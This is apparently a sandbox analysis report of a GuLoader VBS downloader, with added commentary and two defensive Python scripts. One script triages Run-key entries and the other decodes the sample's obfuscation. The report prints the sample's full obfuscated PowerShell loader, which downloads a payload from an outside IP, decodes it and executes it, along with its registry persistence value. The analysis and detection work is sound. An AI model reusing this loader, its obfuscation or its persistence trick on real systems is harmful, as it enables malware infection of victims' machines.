Analysis
max time kernel: 148s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20230221-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230221-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11/03/2023, 03:36
Static task: static1
Behavioral task: behavioral1, sample Vejlensisk90.vbs, resource win7-20230220-en
Behavioral task: behavioral2, sample Vejlensisk90.vbs, resource win10v2004-20230221-en
General
Target: Vejlensisk90.vbs
Size: 34KB
MD5: 5794e47d892a3cab512697ca7dc223f4
SHA1: 91f1ac9d1f3209bc5d1bc790319c3675d5a201ed
SHA256: ffe477577469c87c606e0cbd9d0da68446cd8d895e4f4ab0a083f0a05ac8ab20
SHA512: 3699ec735f33e5b9c2c2d5b18ee75e15b736205adf65db8d30df0b56e7c5b0054f73d1eeb6f01e0e85aacbc5ea6cd004bd90c3f8c84b18db5cdf6ee3c2a1d228
SSDEEP: 768:UObCrpGDPcJLDAxj/gqJ77UgZw3d81bXK4HkMCYFN:J2rpkP2DABveKwNSbXFN
Malware Config
Signatures
GuLoader (CloudEyE)
A shellcode-based downloader first seen in 2020.
Blocklisted process makes network request (1 IoC)
flow 4, PID 2720, WScript.exe
Checks QEMU agent file (2 TTPs, 2 IoCs)
Checks for the QEMU guest agent binary, a common virtualization/sandbox detection check.
File opened (read-only): C:\Program Files\Qemu-ga\qemu-ga.exe, by powershell.exe
File opened (read-only): C:\Program Files\Qemu-ga\qemu-ga.exe, by ielowutil.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, most likely to geofence execution.
Key value queried: \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation, by WScript.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
Key created: \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Windows\CurrentVersion\Run, by ielowutil.exe
Set value (str): \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rundvisn163 = "%TORO% -w 1 $Unludicrou=(Get-ItemProperty -Path 'HKCU:\\Wreak\\').Stemningsb52;%TORO% ($Unludicrou)", by ielowutil.exe
Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
PID 1620 ielowutil.exe (2 events)
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
PID 488 powershell.exe; PID 1620 ielowutil.exe
Suspicious use of SetThreadContext (1 IoC)
PID 488 powershell.exe set thread context of PID 1620 (ielowutil.exe, procid_target 116)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description labels this as likely ransomware behaviour; for a loader such as this one, drive enumeration is more commonly part of environment fingerprinting. No IoCs were recorded for this signature.
Suspicious behavior: EnumeratesProcesses (4 IoCs)
PID 4220 powershell.exe (2 events); PID 488 powershell.exe (2 events)
Suspicious behavior: MapViewOfSection (12 IoCs)
PID 488 powershell.exe (12 events)
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Token: SeDebugPrivilege, PID 4220 powershell.exe; Token: SeDebugPrivilege, PID 488 powershell.exe
Suspicious use of SetWindowsHookEx (1 IoC)
PID 1620 ielowutil.exe
Suspicious use of WriteProcessMemory (42 IoCs)
source PID (process) wrote to memory of target PID (procid_target), number of events:
2720 (WScript.exe) wrote to 4220 (89), 2 events
4220 (powershell.exe) wrote to 488 (91), 3 events
488 (powershell.exe) wrote to 3120 (105), 3 events
488 (powershell.exe) wrote to 5028 (106), 3 events
488 (powershell.exe) wrote to 4384 (107), 3 events
488 (powershell.exe) wrote to 1520 (108), 3 events
488 (powershell.exe) wrote to 2068 (109), 3 events
488 (powershell.exe) wrote to 4016 (110), 3 events
488 (powershell.exe) wrote to 4580 (111), 3 events
488 (powershell.exe) wrote to 3456 (112), 3 events
488 (powershell.exe) wrote to 4644 (113), 3 events
488 (powershell.exe) wrote to 3860 (114), 3 events
488 (powershell.exe) wrote to 3404 (115), 3 events
488 (powershell.exe) wrote to 1620 (116), 4 events
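The Run value recorded above is worth a closer look than the signature name suggests: the executable is an environment variable (%TORO%) rather than a path, the window is hidden (-w 1 is -WindowStyle Hidden), the next stage is read out of an HKCU key (HKCU:\Wreak, value Stemningsb52) instead of a file, and the same variable is invoked a second time on what was read. The following is an added example in Python, not code from the sandbox or the sample, that scores Run values for exactly that pattern. The Rundvisn163 value is the one from this report; the two benign entries are constructed for contrast. The report does not show where %TORO% is defined, so the check treats any non-standard variable in leading position as an indicator rather than assuming it resolves to powershell.exe.

```python
"""Heuristic triage of HKCU\...\CurrentVersion\Run values for the indirection
pattern recorded in this report. Added example; not sandbox or sample code.
"""
import re

# Environment variables a legitimate Run entry commonly starts with. Anything
# else in leading position is treated as attacker-controlled indirection. The
# report does not show where %TORO% is defined, so what it resolves to is an
# assumption; the check flags the pattern, not the value.
STANDARD_ENV_VARS = {
    "SYSTEMROOT", "WINDIR", "PROGRAMFILES", "PROGRAMFILES(X86)", "PROGRAMDATA",
    "APPDATA", "LOCALAPPDATA", "USERPROFILE", "SYSTEMDRIVE", "PUBLIC",
    "COMMONPROGRAMFILES", "COMMONPROGRAMFILES(X86)", "TEMP", "TMP",
}

LEADING_ENV_RE = re.compile(r'^\s*"?%([^%]+)%')
# PowerShell pulling a value out of an HKCU key: the next stage lives in the
# registry rather than on disk.
REG_READ_RE = re.compile(r"Get-ItemProperty\s+-Path\s+'HKCU:", re.IGNORECASE)
# -w 1 is -WindowStyle Hidden (System.Diagnostics.ProcessWindowStyle.Hidden == 1).
HIDDEN_RE = re.compile(r"(?<![\w-])-w(?:indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE)


def run_value_indicators(value: str) -> list[str]:
    """Return the indicators present in one Run value (empty list = nothing seen)."""
    hits: list[str] = []
    lead = LEADING_ENV_RE.match(value)
    if lead and lead.group(1).upper() not in STANDARD_ENV_VARS:
        hits.append(f"launched via non-standard environment variable %{lead.group(1)}%")
    if REG_READ_RE.search(value):
        hits.append("reads next stage from an HKCU registry value")
    if HIDDEN_RE.search(value):
        hits.append("hidden window")
    # The interpreter variable appearing again later means the first invocation
    # only fetches; the second executes what was fetched.
    if lead and value.count(f"%{lead.group(1)}%") >= 2:
        hits.append("interpreter invoked twice: fetch, then execute")
    return hits


def triage(run_values: dict[str, str]) -> dict[str, list[str]]:
    """Map each Run value name to its indicators, dropping clean entries."""
    flagged: dict[str, list[str]] = {}
    for name, value in run_values.items():
        hits = run_value_indicators(value)
        if hits:
            flagged[name] = hits
    return flagged


SAMPLE_RUN_VALUES = {
    # Recorded in the report under HKCU\...\CurrentVersion\Run
    "Rundvisn163": r"%TORO% -w 1 $Unludicrou=(Get-ItemProperty -Path 'HKCU:\\Wreak\\').Stemningsb52;%TORO% ($Unludicrou)",
    # Constructed benign entries for contrast (not from the report)
    "OneDrive": r'"%LOCALAPPDATA%\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
}

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_RUN_VALUES).items():
        print(name)
        for hit in hits:
            print("  -", hit)
```

Run against the three values, only Rundvisn163 is flagged, with all four indicators. On a live host the same function can be fed the output of `Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run` for every loaded user hive; the registry value that %TORO% reads (HKCU:\Wreak, Stemningsb52) is the artifact to collect alongside the Run entry.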
Processes
C:\Windows\System32\WScript.exe (depth 1, PID 2720)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Vejlensisk90.vbs"
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 4220)
  Command line:
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Foetureta9 ([String]$Eddikeb){For($Modemets=1; $Modemets -lt $Eddikeb.Length-1; $Modemets+=(1+1)){$mdeaftens=$mdeaftens+$Eddikeb.Substring($Modemets, 1)};$mdeaftens;}$cate=Foetureta9 ' hAt t p :U/P/A1B9 4N.B1F8 0 .b4 8R.A2K1H1 / z a rPaN/FDPeHdEeTp sHe uSd 5L2T. t o cH ';$mdeaftens01=Foetureta9 ' iOeTx ';$Sacr = Foetureta9 'T\Es ySsUwHo w 6 4S\PW iSn dSo wBsEP o w e rOSHhReKl lS\ vD1W.B0 \ p o wmeMr srhOe lAlF.me xSe ';.($mdeaftens01) (Foetureta9 'S$ RDa vGkBn o p 2G= $CeOn vS:FwriPnSdRi rT ') ;.($mdeaftens01) (Foetureta9 'C$GS aScRrp=D$ R a vAk nCoapR2A+ $ SpaKcTr ') ;.($mdeaftens01) (Foetureta9 'H$ Y aErDlA D= (A( g wsm iS LwIi nA3 2 _ pBrSoDc ePs s -DF PTrDo c eMsSsRI dG=S$N{AP I D }U) .FC oUm mCa nTdFLLiOnBeS) S- sUpSl i tC [Lc h aDr ]N3 4S ');.($mdeaftens01) (Foetureta9 ' $IF o rPsDbPnS1 3C3M G= A$MYGa r lu[ $ YTaAr lP.Scbo u n tG-C2 ] ');.($mdeaftens01) (Foetureta9 'H$MM o dAe lO= (RTAeHs t - PcaUtWh R$AS aRcNr )K e- A nEdA S( [DIDnbtAP tNr ]H:R: sFi z e - e q R8B) ') ;if ($Model) {.$Sacr $Forsbn133;} else {;$mdeaftens00=Foetureta9 'SS tGaDrSt -UB iOtDsITArBaEnBs f e r G- S oruSrsc eN S$ c a tFeU -DDSe sSt i n aDtRi oRnC Y$PR aWvdkUn o p 2F ';.($mdeaftens01) (Foetureta9 'S$TRKaAvIk nSo pF2L=N$ eRn vs:TaBp ppdOaKtIaJ ') ;.($mdeaftens01) (Foetureta9 'WIUmmpTo r tP-BMGoFdPuBl e UBRiBt s TSr aUnts fSeBrG ') ;$Ravknop2=$Ravknop2+'\Raao.pal';while (-not $Forhandle10) {.($mdeaftens01) (Foetureta9 'M$ F oPrPhba nLd l eI1F0N=D(RTJeOsFt -KP aBtJhh K$ERAa vhk nPo ps2T)H ') ;.($mdeaftens01) $mdeaftens00;.($mdeaftens01) (Foetureta9 ' SMt aSrAt -OS lCe eDpb 5 ');}.($mdeaftens01) (Foetureta9 ' $FFFoSe tUu r eGtMaf N=E AG ertS- CCoAnItGeRnBtR P$ R aMvTk nAo p 2 ');.($mdeaftens01) (Foetureta9 ' $ PJeFlUoSt oJn P= K[UScy s tUePmP. 
  CJoAn vUe r t ]R: : FOr oTmvBFa s eM6 4DS tHr iFnWgL(s$CFJo e tDu r eSt a )R ');.($mdeaftens01) (Foetureta9 'P$ mCdEeTaTf taeRn s 2E =T [ASMyKs t e mK.PTReLx t .VERn c o d i nMgE] :C:uARSJC ILIH.CGDeftTS t r i nHg (N$SPCeSl o tSoEnS) ');.($mdeaftens01) (Foetureta9 'A$TN o nrcso =F$Um dIeBa fRtTeVnAsO2S.BsEu bPsCt rCifnGgS(S1Z8B8 2 6 4 ,T1M9c3B3 5B)F ');.($mdeaftens01) $Nonco;}"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 488)
    Command line (same script as the parent, re-executed under the 32-bit host):
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Foetureta9 ([String]$Eddikeb){For($Modemets=1; $Modemets -lt $Eddikeb.Length-1; $Modemets+=(1+1)){$mdeaftens=$mdeaftens+$Eddikeb.Substring($Modemets, 1)};$mdeaftens;}$cate=Foetureta9 ' hAt t p :U/P/A1B9 4N.B1F8 0 .b4 8R.A2K1H1 / z a rPaN/FDPeHdEeTp sHe uSd 5L2T. t o cH ';$mdeaftens01=Foetureta9 ' iOeTx ';$Sacr = Foetureta9 'T\Es ySsUwHo w 6 4S\PW iSn dSo wBsEP o w e rOSHhReKl lS\ vD1W.B0 \ p o wmeMr srhOe lAlF.me xSe ';.($mdeaftens01) (Foetureta9 'S$ RDa vGkBn o p 2G= $CeOn vS:FwriPnSdRi rT ') ;.($mdeaftens01) (Foetureta9 'C$GS aScRrp=D$ R a vAk nCoapR2A+ $ SpaKcTr ') ;.($mdeaftens01) (Foetureta9 'H$ Y aErDlA D= (A( g wsm iS LwIi nA3 2 _ pBrSoDc ePs s -DF PTrDo c eMsSsRI dG=S$N{AP I D }U) .FC oUm mCa nTdFLLiOnBeS) S- sUpSl i tC [Lc h aDr ]N3 4S ');.($mdeaftens01) (Foetureta9 ' $IF o rPsDbPnS1 3C3M G= A$MYGa r lu[ $ YTaAr lP.Scbo u n tG-C2 ] ');.($mdeaftens01) (Foetureta9 'H$MM o dAe lO= (RTAeHs t - PcaUtWh R$AS aRcNr )K e- A nEdA S( [DIDnbtAP tNr ]H:R: sFi z e - e q R8B) ') ;if ($Model) {.$Sacr $Forsbn133;} else {;$mdeaftens00=Foetureta9 'SS tGaDrSt -UB iOtDsITArBaEnBs f e r G- S oruSrsc eN S$ c a tFeU -DDSe sSt i n aDtRi oRnC Y$PR aWvdkUn o p 2F ';.($mdeaftens01) (Foetureta9 'S$TRKaAvIk nSo pF2L=N$ eRn vs:TaBp ppdOaKtIaJ ') ;.($mdeaftens01) (Foetureta9 'WIUmmpTo r tP-BMGoFdPuBl e UBRiBt s TSr aUnts fSeBrG ') ;$Ravknop2=$Ravknop2+'\Raao.pal';while (-not $Forhandle10) {.($mdeaftens01) (Foetureta9 'M$ F oPrPhba nLd l eI1F0N=D(RTJeOsFt -KP aBtJhh K$ERAa vhk nPo ps2T)H ') ;.($mdeaftens01) $mdeaftens00;.($mdeaftens01) (Foetureta9 ' SMt aSrAt -OS lCe eDpb 5 ');}.($mdeaftens01) (Foetureta9 ' $FFFoSe tUu r eGtMaf N=E AG ertS- CCoAnItGeRnBtR P$ R aMvTk nAo p 2 ');.($mdeaftens01) (Foetureta9 ' $ PJeFlUoSt oJn P= K[UScy s tUePmP. 
    CJoAn vUe r t ]R: : FOr oTmvBFa s eM6 4DS tHr iFnWgL(s$CFJo e tDu r eSt a )R ');.($mdeaftens01) (Foetureta9 'P$ mCdEeTaTf taeRn s 2E =T [ASMyKs t e mK.PTReLx t .VERn c o d i nMgE] :C:uARSJC ILIH.CGDeftTS t r i nHg (N$SPCeSl o tSoEnS) ');.($mdeaftens01) (Foetureta9 'A$TN o nrcso =F$Um dIeBa fRtTeVnAsO2S.BsEu bPsCt rCifnGgS(S1Z8B8 2 6 4 ,T1M9c3B3 5B)F ');.($mdeaftens01) $Nonco;}"
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
      C:\Program Files (x86)\internet explorer\ieinstal.exe (depth 4), eleven instances, no arguments, no flagged signatures:
      PID 3120
      PID 5028
      PID 4384
      PID 1520
      PID 2068
      PID 4016
      PID 4580
      PID 3456
      PID 4644
      PID 3860
      PID 3404
      C:\Program Files (x86)\internet explorer\ielowutil.exe (depth 4, PID 1620)
      Command line: "C:\Program Files (x86)\internet explorer\ielowutil.exe"
      - Checks QEMU agent file
      - Adds Run key to start application
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetWindowsHookEx
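Both PowerShell entries in the tree above (depth 2 under System32, depth 3 under syswow64) carry the same script, and its only obfuscation is the Foetureta9 function shown in clear at the start of the command line: it walks the argument from index 1 in steps of 2 and keeps those characters, so every odd-index character is plaintext and every even-index character is junk. $mdeaftens01 decodes to iex, so each .($mdeaftens01) (Foetureta9 '...') call is Invoke-Expression on one decoded line. Decoding the literals that contain no spaces recovers the download URL assigned to $cate, the string \syswow64\WindowsPowerShell\v1.0\powershell.exe that is appended to $env:windir to form $Sacr, and the final carve-out $Nonco=$mdeaftens2.substring(188264,19335) that is handed to iex. The $Model test ((Test-Path $Sacr) -and ([IntPtr]::size -eq 8)) explains the process tree: when the script finds itself in 64-bit PowerShell it re-executes its own body under the 32-bit host, which is why PID 4220 spawns PID 488 with an identical command line, and only the 32-bit instance goes on to BITS-download %APPDATA%\Raao.pal, base64-decode it and run the carved-out slice. The following is an added example in Python, not code from the sample or the sandbox; the four literals it decodes are copied from the command line above. One caveat a practitioner needs: the rendered report collapses runs of spaces, so any literal whose plaintext itself contains a space (most of the assignment lines) has lost characters and decodes out of phase from this page. The interleave and html_collapse helpers reproduce that failure; take those literals from the raw .vbs rather than from the report.

```python
"""Decoder for the character-interleaving obfuscation in this sample's PowerShell
stage. Added example in Python; not code from the sample or the sandbox. The
obfuscated literals in CMDLINE_FRAGMENT are copied from the command line shown
in the report above.
"""
import re

# Call sites in the command line have the form: Foetureta9 '<interleaved literal>'
CALL_RE = re.compile(r"Foetureta9\s*'([^']*)'")


def foetureta9(s: str) -> str:
    """Port of the sample's Foetureta9 decoder.

    PowerShell: For($i=1; $i -lt $s.Length-1; $i+=2) { $out += $s.Substring($i, 1) }
    Odd indices carry the plaintext, even indices carry junk, and the loop stops
    strictly below Length-1; Python's slice s[1:len(s)-1:2] is the same walk.
    """
    return s[1:len(s) - 1:2]


def interleave(plain: str, junk: str = "X") -> str:
    """Inverse operation in the sample's layout: junk, then (char, junk) per
    plaintext character. Used here to build test vectors for the decoder."""
    return junk + "".join(c + junk for c in plain)


def decode_all(command_line: str) -> list[str]:
    """Decode every Foetureta9 '...' literal in a command line, in order."""
    return [foetureta9(lit) for lit in CALL_RE.findall(command_line)]


def html_collapse(s: str) -> str:
    """Model of what the rendered report does to a literal: runs of spaces
    become a single space. A literal whose plaintext has a space next to a
    junk space loses characters and from then on decodes out of phase."""
    return re.sub(r" {2,}", " ", s)


# Four literals from the report whose plaintext contains no spaces, so they
# survived rendering intact: the download URL, the invoke alias, the 32-bit
# PowerShell path appended to $env:windir, and the payload carve-out.
CMDLINE_FRAGMENT = (
    "$cate=Foetureta9 ' hAt t p :U/P/A1B9 4N.B1F8 0 .b4 8R.A2K1H1 / z a rPaN/FDPeHdEeTp sHe uSd 5L2T. t o cH ';"
    "$mdeaftens01=Foetureta9 ' iOeTx ';"
    r"$Sacr = Foetureta9 'T\Es ySsUwHo w 6 4S\PW iSn dSo wBsEP o w e rOSHhReKl lS\ vD1W.B0 \ p o wmeMr srhOe lAlF.me xSe ';"
    ".($mdeaftens01) (Foetureta9 'A$TN o nrcso =F$Um dIeBa fRtTeVnAsO2S.BsEu bPsCt rCifnGgS(S1Z8B8 2 6 4 ,T1M9c3B3 5B)F ');"
)

if __name__ == "__main__":
    for line in decode_all(CMDLINE_FRAGMENT):
        print(line)
    # Round trip succeeds on the original layout and fails after space collapsing.
    lit = interleave("Start-Sleep 5", " ")
    print(repr(foetureta9(lit)), repr(foetureta9(html_collapse(lit))))
```

decode_all on the fragment yields, in order, the stage-two URL (hxxp://194[.]180[.]48[.]211/zara/Dedepseud52.toc, defanged here), iex, \syswow64\WindowsPowerShell\v1.0\powershell.exe and $Nonco=$mdeaftens2.substring(188264,19335); the last tells you the downloaded file must base64-decode to at least 207,599 bytes, of which only the 19,335-byte window at offset 188,264 is executed. Feeding the same CALL_RE over the full command line taken from the original .vbs (not from this page) reconstructs the whole script.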
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82